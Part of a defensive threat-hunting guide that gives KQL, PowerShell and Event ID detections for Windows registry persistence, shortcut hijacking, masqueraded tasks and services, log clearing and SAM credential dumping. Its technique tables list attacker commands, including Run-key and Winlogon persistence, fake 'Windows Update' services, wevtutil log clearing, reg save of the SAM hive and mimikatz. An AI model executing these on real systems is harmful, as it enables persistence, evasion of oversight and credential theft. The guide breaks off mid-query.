# part 3 ## ๐Ÿšจ **Modify Registry** ### ๐Ÿ” **1. Attack Breakdown** #### ๐Ÿ“ **What is Registry Modification?** * The **Windows Registry** is a hierarchical database used to store **system settings, application configurations, and user preferences**. * **Attackers often modify the registry** to: * **Establish Persistence:** Ensure malware executes at startup. * **Disable Security Controls:** Turn off antivirus or logging. * **Configure Malware Behavior:** Adjust system or application settings for malicious purposes. * **Hide Artifacts:** Conceal malicious files or processes. *** #### ๐Ÿ“‘ **Why Attackers Use Registry Modifications?** * **Persistence:** Malware can auto-start on system boot. * **Stealth:** Changes are often hard to detect without monitoring. * **Control:** Modify system behavior for exploitation. * **Fileless Attacks:** Execute scripts directly from the registry. #### ๐Ÿ“Œ **Common Registry Keys Abused by Attackers** | **Key** | **Purpose** | **Example Command** | | ------------------------------------------------------------------ | ------------------------------ | --------------------------------------------------------------------------------- | | `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` | Persistence via user login | `reg add "HKCU\...\Run" /v Malware /t REG_SZ /d "C:\malicious.exe"` | | `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell` | Replace shell for persistence | `reg add "HKLM\...\Winlogon" /v Shell /t REG_SZ /d "explorer.exe, malicious.exe"` | | `HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System` | Disable Task Manager | `reg add "HKCU\...\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1` | | `HKLM\SYSTEM\CurrentControlSet\Services` | Modify service behavior | `reg add "HKLM\...\Services" /v ImagePath /t REG_EXPAND_SZ /d "C:\malicious.exe"` | | `HKCU\Software\Classes\mscfile\shell\open\command` | Hijack MSC files for execution | `reg add "HKCU\...\open\command" /d "malicious.exe"` | *** #### ๐Ÿ›ก๏ธ **2. Detection Techniques** #### ๐Ÿ“Š **Manual Detection via PowerShell** **๐Ÿ•ต๏ธ List Startup Entries in Registry:** ```powershell Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" ``` **๐Ÿ•ต๏ธ Search for Suspicious Keys:** ```powershell Get-ChildItem -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Recurse Get-ChildItem -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" ``` **๐Ÿ•ต๏ธ Check Disabled Security Settings:** ```powershell Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" | Select-Object DisableAntiSpyware ``` *** #### ๐Ÿ“Š **Microsoft Defender for Endpoint (MDE) Query (KQL)** **๐Ÿ•ต๏ธ Detect Registry Modifications:** ```kusto DeviceRegistryEvents | where ActionType == "RegistryValueSet" | where RegistryKey contains "Run" or RegistryKey contains "Winlogon" | project Timestamp, DeviceName, RegistryKey, RegistryValueName, RegistryValueData, AccountName ``` **๐Ÿ•ต๏ธ Identify Security Settings Disabled:** ```kusto DeviceRegistryEvents | where RegistryKey contains "Windows Defender" | where RegistryValueName in ("DisableAntiSpyware", "DisableRealtimeMonitoring") | where RegistryValueData == "1" | project Timestamp, DeviceName, RegistryKey, RegistryValueName, RegistryValueData ``` **๐Ÿ•ต๏ธ Persistence via Registry:** ```kusto DeviceRegistryEvents | where RegistryKey contains "Run" or RegistryKey contains "RunOnce" | where RegistryValueData contains ".exe" | project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName ``` **๐Ÿ•ต๏ธ Look for Fileless Execution:** ```kusto DeviceRegistryEvents | where RegistryValueData contains "powershell" or RegistryValueData contains "cmd.exe" | project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName ``` **๐Ÿ•ต๏ธ Track Registry Key Creation:** ```kusto DeviceRegistryEvents | where ActionType == "RegistryKeyCreated" | where RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" | project Timestamp, DeviceName, RegistryKey, AccountName ``` *** #### ๐Ÿ“Š **Event Viewer Logs** * **Event ID 4657:** Registry Value Modification * **Event ID 4663:** Object Access Attempt * **Event ID 4688:** Process Creation **๐Ÿ“Œ Focus on These Indicators:** * **Processes Making Changes:** `powershell.exe`, `cmd.exe`, `reg.exe`, `regedit.exe` * **Suspicious Paths:** `HKCU:\...\Run`, `HKLM:\...\Winlogon`, `HKCU:\...\Policies` * **New or Modified Keys:** Look for `.exe`, `.bat`, `.vbs` references in key values. *** ### ๐Ÿ•ต๏ธ **3. Investigation Techniques** #### 1๏ธโƒฃ **Identify Processes Making Registry Changes** ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4657} | Select-Object TimeCreated, Message ``` *** #### 2๏ธโƒฃ **Trace Suspicious Registry Values** * Investigate recent changes in critical registry paths: ```powershell Get-ChildItem -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" | Select-Object Name, Value ``` *** #### 3๏ธโƒฃ **Look for Fileless Malware** * Check registry keys for encoded scripts: ```powershell Get-ChildItem -Path "HKCU:\Software" -Recurse | Where-Object { $_.Value -match "powershell" -or $_.Value -match "cmd.exe" } ``` *** #### 4๏ธโƒฃ **Correlate with Process Execution** * Cross-reference with processes using **Event ID 4688**. *** ### ๐Ÿ”ง **4. Remediation Steps** #### ๐Ÿ“Œ **1. Identify and Remove Malicious Registry Keys** ```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "MaliciousKey" ``` #### ๐Ÿ“Œ **2. Restore Default Security Settings** ```powershell Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 ``` #### ๐Ÿ“Œ **3. Terminate Related Processes** ```powershell Stop-Process -Name "powershell" -Force ``` #### ๐Ÿ“Œ **4. Quarantine Malicious Files** ```powershell Move-Item -Path "C:\Temp\malicious.exe" -Destination "C:\Quarantine" ``` #### ๐Ÿ“Œ **5. Perform Full Antivirus Scan** ```powershell Start-MpScan -ScanType FullScan ``` *** ### ๐Ÿ›ก๏ธ **5. Prevention Steps** 1. **Enable Registry Auditing:** * Configure auditing for sensitive registry paths. 2. **Use Attack Surface Reduction (ASR) Rules:** ```powershell Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled ``` 3. **Disable Unused Registry Tools:** * Restrict access to `reg.exe` and `regedit.exe` for non-admin users. 4. **Enable Tamper Protection in Defender:** ```powershell Set-MpPreference -DisableTamperProtection $false ``` 5. **Educate Users:** * Train users to recognize social engineering attacks leading to registry modifications. *** ### ๐Ÿง  **6. Key Takeaways** * **Persistence is Key:** Monitor startup and Winlogon registry keys. * **Disable Known Attack Paths:** Prevent scripts from running via registry. * **Real-Time Alerts:** Monitor changes to sensitive keys (`Run`, `Winlogon`). * **Registry Auditing:** Enable Event IDs **4657**, **4688**, and **4663**. *** ## ๐Ÿšจ **Boot or Logon Autostart Execution: Shortcut Modification** ### ๐Ÿ” **1. Attack Breakdown** #### ๐Ÿ“ **What is Shortcut Modification Attack?** * **Shortcut Modification** involves altering **Windows shortcut files (.lnk)** to execute malicious commands or scripts during **boot** or **user logon**. * Attackers modify shortcut targets to execute **malicious payloads** instead of their original programs. #### ๐Ÿ“‘ **Why Attackers Use Shortcut Modification?** * **Persistence:** Ensures malicious code runs at every system boot or user logon. * **Stealth:** Modified shortcuts appear legitimate to unsuspecting users. * **Execution Without Alerts:** Often bypasses security tools that monitor startup keys. * **User Trust:** Users are more likely to trust familiar application shortcuts. *** #### ๐Ÿ“Œ **Common Shortcut Modification Techniques** | **Technique** | **Example Command** | **Purpose** | | ------------------------------- | ---------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------- | | **Startup Folder Modification** | `echo [malicious command] > C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\example.lnk` | Run malware at user logon | | **Modify Desktop Shortcuts** | `powershell -Command "Start-Process calc.exe"` | Replace target of a common shortcut | | **Modify Taskbar Shortcuts** | `C:\Windows\System32\cmd.exe /c malicious.exe` | Hijack taskbar or pinned shortcut | | **LNK File Injection** | `copy malicious.lnk C:\Users\\Start Menu\Programs\Startup\` | Inject malicious shortcut | | **Path Hijacking via Shortcut** | `C:\Windows\System32\cmd.exe /k "C:\Temp\payload.exe"` | Execute malicious binary instead of the original program | *** #### ๐Ÿ›ก๏ธ **2. Detection Techniques** #### ๐Ÿ“Š **Manual Inspection** **๐Ÿ•ต๏ธ Check Startup Folder for Suspicious Shortcuts:** ```powershell ุณุฎ ุงู„ูƒูˆุฏGet-ChildItem -Path "C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" -Filter "*.lnk" | Select-Object Name, LastWriteTime ``` **๐Ÿ•ต๏ธ Check Shortcut Target Paths:** ```powershell (Get-Item "C:\Users\\Desktop\example.lnk").TargetPath ``` **๐Ÿ•ต๏ธ Check for Suspicious Commands in Shortcuts:** ```powershell (Get-Item "C:\Users\\Desktop\example.lnk").Arguments ``` **๐Ÿ•ต๏ธ Identify Modified Shortcuts:** ```powershell Get-ChildItem -Path "C:\Users\*\Desktop" -Filter "*.lnk" | Select-Object Name, LastWriteTime ``` *** #### ๐Ÿ“Š **Microsoft Defender for Endpoint (MDE) Query (KQL)** **๐Ÿ•ต๏ธ Detect Shortcut Modifications in Startup Folders:** ```kusto DeviceFileEvents | where FolderPath contains "Startup" | where FileName endswith ".lnk" | where ActionType in ("FileCreated", "FileModified") | project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessFileName, AccountName ``` **๐Ÿ•ต๏ธ Identify Suspicious Shortcut Arguments:** ```kusto DeviceFileEvents | where FileName endswith ".lnk" | where InitiatingProcessCommandLine contains "cmd.exe" or InitiatingProcessCommandLine contains "powershell.exe" | project Timestamp, DeviceName, FileName, InitiatingProcessCommandLine, AccountName ``` **๐Ÿ•ต๏ธ Monitor Common Hijacked Paths:** ```kusto DeviceFileEvents | where FolderPath contains "Desktop" or FolderPath contains "Start Menu" | where FileName endswith ".lnk" | where InitiatingProcessFileName in ("cmd.exe", "powershell.exe") | project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, AccountName ``` **๐Ÿ•ต๏ธ Check Persistence via Modified Shortcuts:** ```kusto DeviceRegistryEvents | where RegistryKey contains "Run" | where RegistryValueData contains ".lnk" | project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName ``` *** #### ๐Ÿ“Š **Event Viewer Logs** * **Event ID 4663:** Object Access Attempt * **Event ID 4688:** Process Creation * **Event ID 4670:** Permissions on an Object Were Changed **๐Ÿ•ต๏ธ Filter Suspicious Activities in Event Viewer:** * Open **Event Viewer โ†’ Security โ†’ Filter by Event ID 4688** * Look for: * **FileName:** `.lnk` * **InitiatingProcess:** `cmd.exe`, `powershell.exe` *** ### ๐Ÿ•ต๏ธ **3. Investigation Techniques** #### 1๏ธโƒฃ **Analyze Shortcut Target Paths** ```powershell (Get-Item "C:\Users\\Desktop\suspicious.lnk").TargetPath ``` #### 2๏ธโƒฃ **Trace Parent Processes** * Check what triggered the creation or modification of the shortcut: ```powershell Get-CimInstance Win32_Process | Where-Object { $_.CommandLine -match ".lnk" } ``` #### 3๏ธโƒฃ **Check for Suspicious Files in Startup Folders** ```powershell Get-ChildItem -Path "C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" -Filter "*.lnk" ``` #### 4๏ธโƒฃ **Review Recently Modified Shortcuts** * Check recent changes in shortcut files: ```powershell Get-ChildItem -Path "C:\Users\*\Desktop" -Filter "*.lnk" | Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) } ``` #### 5๏ธโƒฃ **Inspect Registry Keys** * Look for `.lnk` references in **Run** keys: ```powershell Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" ``` *** ### ๐Ÿ”ง **4. Remediation Steps** #### ๐Ÿ“Œ **1. Remove Malicious Shortcuts** ```powershell Remove-Item -Path "C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\suspicious.lnk" ``` #### ๐Ÿ“Œ **2. Quarantine Malicious Payloads** ```powershell Move-Item -Path "C:\Temp\malware.exe" -Destination "C:\Quarantine" ``` #### ๐Ÿ“Œ **3. Remove Registry Persistence** ```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "MaliciousKey" ``` #### ๐Ÿ“Œ **4. Terminate Malicious Processes** ```powershell Stop-Process -Name "cmd" -Force Stop-Process -Name "powershell" -Force ``` #### ๐Ÿ“Œ **5. Perform Full Antivirus Scan** ```powershell Start-MpScan -ScanType FullScan ``` *** ### ๐Ÿ›ก๏ธ **5. Prevention Steps** 1. **Enable Attack Surface Reduction (ASR) Rules:** ```powershell Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled ``` 2. **Restrict Write Access to Startup Folders:** * Limit permissions on `C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup`. 3. **Audit Shortcut Modifications:** * Enable auditing for `.lnk` file changes. 4. **Disable Auto-Execution from Startup Folder:** * Block execution of scripts from `Startup` via **Group Policy**. 5. **Educate Users:** * Train users to avoid clicking on `.lnk` files from untrusted sources. *** ### ๐Ÿง  **6. Key Takeaways** * **Monitor Shortcut Modifications:** Watch `.lnk` files in `Startup` and `Desktop`. * **Audit Key Paths:** Regularly review `Startup` and `Run` registry keys. * **Analyze Shortcut Targets:** Investigate modified `.lnk` file targets. * **Focus on Persistence Mechanisms:** Pay attention to `cmd.exe`, `powershell.exe`, and suspicious arguments. *** ## ๐Ÿšจ **Masquerade Task or Service** ### ๐Ÿ” **1. Attack Breakdown** #### ๐Ÿ“ **What is Task or Service Masquerading?** * **Masquerading** occurs when an attacker **disguises a malicious scheduled task or Windows service** to appear **legitimate**. * Attackers often name tasks or services similar to **system processes** (e.g., `svchost.exe`, `explorer.exe`) to avoid detection. #### ๐Ÿ“‘ **Why Attackers Use Task or Service Masquerading?** * **Persistence:** Ensures malware or malicious scripts run automatically on startup. * **Stealth:** Mimics legitimate services or tasks to evade detection. * **Privilege Escalation:** May run tasks/services with elevated privileges. * **Reduces Suspicion:** Security teams might overlook familiar-looking names. *** #### ๐Ÿ“Œ **Common Techniques** | **Technique** | **Example Command** | **Purpose** | | ----------------------------------------- | --------------------------------------------------------------------------------------------- | ------------------------------------ | | **Scheduled Task Masquerade** | `schtasks /create /tn "Windows Update" /tr C:\Temp\malware.exe /sc daily /ru SYSTEM` | Create a disguised scheduled task | | **Service Creation with Masquerade Name** | `sc create WindowsUpdate type= own start= auto binPath= "C:\Temp\malware.exe"` | Create a fake Windows Update service | | **Modify Existing Services** | `sc config TrustedInstaller binPath= "C:\Temp\malware.exe"` | Hijack legitimate services | | **Hidden Tasks** | `schtasks /create /tn "Windows Security" /tr powershell.exe -enc ZWNobyBoZWxsbyA= /sc minute` | Create hidden tasks | | **Fake Parent Process** | `cmd.exe /c start svchost.exe -k netsvcs` | Mimic a legitimate process | *** ### ๐Ÿ›ก๏ธ **2. Detection Techniques** #### ๐Ÿ“Š **Manual Inspection** **๐Ÿ•ต๏ธ List Scheduled Tasks** ```powershell ุณุฎ ุงู„ูƒูˆุฏGet-ScheduledTask | Where-Object { $_.TaskPath -like "*Windows*" } | Select-Object TaskName, TaskPath, State ``` **๐Ÿ•ต๏ธ Inspect Task Command Lines** ```powershell Get-ScheduledTaskInfo -TaskName "Windows Update" ``` **๐Ÿ•ต๏ธ List All Windows Services** ```powershell Get-Service | Where-Object { $_.StartType -eq "Automatic" } | Select-Object Name, DisplayName, StartType, Status ``` **๐Ÿ•ต๏ธ Inspect Service Configurations** ```powershell Get-WmiObject Win32_Service | Select-Object Name, DisplayName, PathName, StartMode ``` **๐Ÿ•ต๏ธ Find Unusual Paths in Service Binaries** ```powershell Get-WmiObject Win32_Service | Where-Object { $_.PathName -notlike "*system32*" } | Select-Object Name, PathName ``` *** #### ๐Ÿ“Š **Microsoft Defender for Endpoint (MDE) Query (KQL)** **๐Ÿ•ต๏ธ Detect Suspicious Scheduled Tasks** ```kusto DeviceProcessEvents | where FileName == "schtasks.exe" | where ProcessCommandLine contains "/create" | where ProcessCommandLine contains "Windows Update" or ProcessCommandLine contains "Security" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **๐Ÿ•ต๏ธ Identify Suspicious Services Created or Modified** ```kusto DeviceProcessEvents | where FileName == "sc.exe" | where ProcessCommandLine contains "create" or ProcessCommandLine contains "config" | where ProcessCommandLine contains "svchost" or ProcessCommandLine contains "update" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **๐Ÿ•ต๏ธ Find Services with Non-Standard Binary Paths** ```kusto DeviceRegistryEvents | where RegistryKey contains "SYSTEM\\CurrentControlSet\\Services" | where RegistryValueData !contains "C:\\Windows\\System32" | project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName ``` **๐Ÿ•ต๏ธ Look for Tasks Executing from Suspicious Paths** ```kusto DeviceFileEvents | where FolderPath contains "Temp" or FolderPath contains "AppData" | where FileName endswith ".exe" | project Timestamp, DeviceName, FolderPath, FileName, InitiatingProcessCommandLine ``` *** #### ๐Ÿ“Š **Event Viewer Logs** | **Event ID** | **Description** | | ------------ | ----------------------------------------- | | **4697** | A service was installed in the system | | **4698** | A scheduled task was created | | **4702** | A scheduled task was updated | | **7045** | A new service was installed on the system | **๐Ÿ“Œ Focus on These Indicators:** * **Service Name:** Generic or misleading names (`WindowsUpdate`, `SecurityService`) * **Scheduled Task Names:** Mimic system tasks (`Windows Defender Update`, `Security Scan`) * **Paths:** Non-standard paths like `C:\Temp\malware.exe` *** ### ๐Ÿ•ต๏ธ **3. Investigation Techniques** #### 1๏ธโƒฃ **Review Scheduled Task Details** * Inspect task triggers and command lines: ```powershell schtasks /query /tn "Windows Update" /v /fo LIST ``` #### 2๏ธโƒฃ **Inspect Service Binary Paths** * Verify the service path and startup type: ```powershell sc qc WindowsUpdate ``` #### 3๏ธโƒฃ **Trace Parent Processes** * Identify the parent process for suspicious tasks: ```powershell Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq } ``` #### 4๏ธโƒฃ **Validate File Hashes** * Check binaries used by tasks and services: ```powershell Get-FileHash "C:\Temp\malware.exe" ``` #### 5๏ธโƒฃ **Check Registry for Service Entries** * Review suspicious registry keys: ```powershell reg query "HKLM\SYSTEM\CurrentControlSet\Services" ``` *** ### ๐Ÿ”ง **4. Remediation Steps** #### ๐Ÿ“Œ **1. Disable and Remove Malicious Tasks** ```powershell schtasks /delete /tn "Windows Update" /f ``` #### ๐Ÿ“Œ **2. Stop and Delete Malicious Services** ```powershell sc stop WindowsUpdate sc delete WindowsUpdate ``` #### ๐Ÿ“Œ **3. Remove Registry Entries** ```powershell Remove-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WindowsUpdate" -Force ``` #### ๐Ÿ“Œ **4. Quarantine Malicious Files** ```powershell Move-Item -Path "C:\Temp\malware.exe" -Destination "C:\Quarantine" ``` #### ๐Ÿ“Œ **5. Perform Full Antivirus Scan** ```powershell Start-MpScan -ScanType FullScan ``` *** ### ๐Ÿ›ก๏ธ **5. Prevention Steps** 1. **Enable Task and Service Auditing:** * Enable **Event IDs 4697, 4698, 4702, and 7045**. 2. **Restrict Service and Task Creation:** * Use **Group Policy** to limit non-admin task and service creation. 3. **Monitor Common Abuse Binaries:** * Tools like `schtasks.exe`, `sc.exe`, and `powershell.exe`. 4. **Enable Attack Surface Reduction (ASR) Rules:** ```powershell Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled ``` 5. **Audit Non-Standard Paths:** * Services running from `C:\Temp`, `C:\Users`, or `C:\ProgramData`. 6. **Implement Least Privilege Access:** * Restrict administrative privileges for regular users. 7. **Educate Users:** * Train users to recognize suspicious behavior and report anomalies. *** ### ๐Ÿง  **6. Key Takeaways** * **Persistence Tactics:** Scheduled tasks and services are common attack vectors. * **Mimicry is Key:** Attackers use misleading names to avoid detection. * **Auditing is Essential:** Monitor task and service creations using Event Logs and Defender telemetry. * **Focus on Execution Paths:** Legitimate tasks and services rarely use `Temp` or `AppData`. *** ## ๐Ÿšจ **Indicator Removal on Host: Advanced Threat Analysis** ### ๐Ÿ” **1. Attack Breakdown** #### ๐Ÿ“ **What is Indicator Removal on Host?** * **Indicator Removal on Host** is an adversarial tactic used to **erase traces of malicious activity** from a compromised system. * Attackers remove **logs, files, registry entries, scheduled tasks, and artifacts** that could reveal their presence or actions. #### ๐Ÿ“‘ **Why Attackers Remove Indicators?** * **Evade Detection:** Hide traces of malicious activity from security teams and tools. * **Persistence:** Make it harder for incident responders to fully remediate the breach. * **Delay Investigation:** Obscure root cause analysis and delay detection timelines. * **Cover Tracks:** Prevent linking the attacker to the activity. *** #### ๐Ÿ“Œ **Common Techniques for Indicator Removal** | **Technique** | **Description** | **Example Command** | | ---------------------------- | -------------------------------------- | -------------------------------------------------------------------------------- | | **Delete Event Logs** | Erase Windows event logs | `wevtutil cl Security` | | **Clear PowerShell History** | Remove traces from command history | `Remove-Item (Get-PSReadlineOption).HistorySavePath` | | **Delete Files/Artifacts** | Remove malware payloads or logs | `del C:\Temp\malicious.exe` | | **Remove Registry Entries** | Clean persistence artifacts | `reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MalwareKey /f` | | **Disable Logging** | Temporarily stop event logging | `wevtutil sl Security /e:false` | | **Self-Delete Script** | Malware deletes itself after execution | `cmd.exe /c timeout 5 && del %~f0` | *** #### ๐Ÿ›ก๏ธ **2. Detection Techniques** #### ๐Ÿ“Š **Manual Inspection** **๐Ÿ•ต๏ธ Check for Cleared Event Logs** ```powershell wevtutil qe Security /c:10 /f:text ``` * Look for abrupt log gaps or absence of expected events. **๐Ÿ•ต๏ธ Inspect PowerShell Command History** ```powershell (Get-PSReadlineOption).HistorySavePath Get-Content (Get-PSReadlineOption).HistorySavePath ``` * Look for unusual deletions or clearing commands. **๐Ÿ•ต๏ธ Check System Logs for Clearing Commands** ```powershell Get-WinEvent -LogName Security | Where-Object { $_.Message -like "*wevtutil cl*" } ``` **๐Ÿ•ต๏ธ Search for Recent File Deletions** ```powershell Get-ChildItem -Path "C:\Temp" -Recurse | Where-Object { $_.LastWriteTime -gt (Get-Date).AddHours(-24) } ``` **๐Ÿ•ต๏ธ Check Registry Modifications** ```powershell Get-ChildItem -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Recurse ``` *** #### ๐Ÿ“Š **Microsoft Defender for Endpoint (MDE) Query (KQL)** **๐Ÿ•ต๏ธ Detect Log Clearing Commands** ```kusto DeviceProcessEvents | where FileName in~ ("wevtutil.exe", "powershell.exe", "cmd.exe") | where ProcessCommandLine contains "wevtutil cl" or ProcessCommandLine contains "Clear-EventLog" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **๐Ÿ•ต๏ธ Detect PowerShell History Manipulation** ```kusto DeviceFileEvents | where FolderPath contains "C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell" | where FileName contains "ConsoleHost_history.txt" | where ActionType in ("FileDeleted", "FileModified") | project Timestamp, DeviceName, FileName, FolderPath, AccountName ``` **๐Ÿ•ต๏ธ Identify Deleted Files and Artifacts** ```kusto DeviceFileEvents | where ActionType == "FileDeleted" | where FolderPath contains "Temp" or FolderPath contains "AppData" | project Timestamp, DeviceName, FileName, FolderPath, AccountName ``` **๐Ÿ•ต๏ธ Detect Service or Task Deletion** ```kusto DeviceProcessEvents | where FileName == "sc.exe" or FileName == "schtasks.exe" | where ProcessCommandLine contains "delete" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **๐Ÿ•ต๏ธ Registry Cleanup Attempts** ```kusto DeviceRegistryEvents | where ActionType == "RegistryValueDeleted" | where RegistryKey contains "Run" | project Timestamp, DeviceName, RegistryKey, AccountName ``` *** #### ๐Ÿ“Š **Event Viewer Logs** | **Event ID** | **Description** | | ------------ | --------------------------- | | **1102** | The audit log was cleared | | **4688** | A new process was created | | **4657** | Registry value modification | | **4663** | Object access attempt | **๐Ÿ“Œ Focus on Event ID 1102 (Audit Log Cleared)** * Open **Event Viewer โ†’ Windows Logs โ†’ Security** * Look for sudden clearing of logs. **๐Ÿ“Œ Monitor for Suspicious Processes (Event ID 4688)** * Look for commands using `wevtutil`, `del`, `Remove-Item`, or `reg delete`. *** ### ๐Ÿ•ต๏ธ **3. Investigation Techniques** #### 1๏ธโƒฃ **Trace Log Clearing Activities** * Identify the account and source IP involved: ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; Id=1102} ``` #### 2๏ธโƒฃ **Correlate Deleted Files with Processes** * Investigate who and what deleted files: ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4663} ``` #### 3๏ธโƒฃ **Review Command History** * Check recent command history: ```powershell Get-Content (Get-PSReadlineOption).HistorySavePath) | Select-String "wevtutil|Clear-EventLog|Remove-Item" ``` #### 4๏ธโƒฃ **Inspect Registry for Evidence** * Identify modified or deleted registry keys: ```powershell Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" ``` #### 5๏ธโƒฃ **Cross-Reference File Hashes** * Validate hash integrity: ```powershell Get-FileHash "C:\Temp\payload.exe" ``` *** ### ๐Ÿ”ง **4. Remediation Steps** #### ๐Ÿ“Œ **1. Restart Event Logging** ```powershell wevtutil sl Security /e:true ``` #### ๐Ÿ“Œ **2. Restore Logs from Backup** * Restore event logs if backups are available. #### ๐Ÿ“Œ **3. Investigate Deleted Files and Artifacts** * Use forensic tools like **Recuva** or **FTK Imager** to recover deleted files. #### ๐Ÿ“Œ **4. Remove Malicious Registry Entries** ```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "MaliciousKey" ``` #### ๐Ÿ“Œ **5. Quarantine Suspicious Files** ```powershell Move-Item -Path "C:\Temp\malware.exe" -Destination "C:\Quarantine" ``` #### ๐Ÿ“Œ **6. Perform Full Antivirus Scan** ```powershell Start-MpScan -ScanType FullScan ``` *** ### ๐Ÿ›ก๏ธ **5. Prevention Steps** 1. **Enable Security Auditing:** * Ensure **Event ID 1102, 4688, 4663** are enabled. 2. **Enable Tamper Protection:** ```powershell Set-MpPreference -DisableTamperProtection $false ``` 3. **Monitor Log Clearing Tools:** * Watch for `wevtutil`, `Clear-EventLog`, `Remove-Item`. 4. **Restrict Admin Privileges:** * Prevent unauthorized users from clearing logs or modifying the registry. 5. **Implement Attack Surface Reduction (ASR) Rules:** ```powershell Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled ``` 6. **Disable Command History Clearing:** * Enforce retention policies for command history. 7. **Regular Backups:** * Periodically back up event logs and critical system data. *** ### ๐Ÿง  **6. Key Takeaways** * **Monitor Event Log Clearing:** Event ID **1102** is critical. * **File Deletions Are a Red Flag:** Especially in `Temp` or `AppData`. * **Audit Critical Registry Keys:** Monitor `Run` and `RunOnce` entries. * **Prevent Tampering:** Enable **Windows Defender Tamper Protection**. *** ## ๐Ÿšจ **OS Credential Dumping: Security Account Manager (SAM)** ### ๐Ÿ” **1. Attack Breakdown** #### ๐Ÿ“ **What is SAM Credential Dumping?** * **Security Account Manager (SAM)** is a **Windows database file** that stores **local account credentials (NTLM and LM hashes)**. * **Credential dumping** involves extracting these hashes to **escalate privileges**, **move laterally**, or **crack passwords offline**. #### ๐Ÿ“‘ **Why Attackers Use SAM Credential Dumping?** * **Access Local Accounts:** Gain access to local administrator accounts. * **Privilege Escalation:** Use compromised accounts for elevated permissions. * **Offline Hash Cracking:** Crack NTLM hashes without alerting security systems. * **Persistence:** Use stolen hashes for **Pass-the-Hash (PtH)** attacks. #### ๐Ÿ“Œ **Common Methods for SAM Credential Dumping** | **Technique** | **Tool/Command Example** | **Description** | | -------------------------------------- | ------------------------------------- | ---------------------------------------------- | | **Local Copy of SAM and SYSTEM Files** | `copy C:\Windows\System32\config\SAM` | Copy SAM and SYSTEM files for offline analysis | | **Mimikatz SAM Module** | `lsadump::sam` | Dump SAM hashes directly from memory | | **Reg Save Method** | `reg save HKLM\SAM C:\Temp\sam.save` | Export SAM hive via the registry | | **Volume Shadow Copy** | `vssadmin create shadow /for=C:` | Access SAM via shadow copies | | **Impacket (secretsdump.py)** | `secretsdump.py Administrator@IP` | Dump SAM hashes remotely | *** ### ๐Ÿ›ก๏ธ **2. Detection Techniques** #### ๐Ÿ“Š **Manual Inspection with PowerShell** **๐Ÿ•ต๏ธ Look for Suspicious Access to SAM Registry Hive** ```powershell Get-EventLog -LogName Security -InstanceId 4663 | Where-Object { $_.Message -like "*SAM*" } ``` **๐Ÿ•ต๏ธ Monitor Registry Export Commands** ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*reg save HKLM\SAM*" } ``` **๐Ÿ•ต๏ธ Identify Shadow Copy Abuse** ```powershell vssadmin list shadows ``` *** #### ๐Ÿ“Š **Microsoft Defender for Endpoint (MDE) Query (KQL)** **๐Ÿ•ต๏ธ Detect Access to SAM Files** ```kusto DeviceFileEvents | where FileName in ("SAM", "SYSTEM") | where FolderPath contains "Windows\\System32\\config" | where ActionType == "FileAccessed" | project Timestamp, DeviceName, FileName, FolderPath, AccountName, InitiatingProcessFileName ``` **๐Ÿ•ต๏ธ Detect Registry Hive Export (reg save HKLM\SAM)** ```kusto DeviceProcessEvents | where FileName == "reg.exe" | where 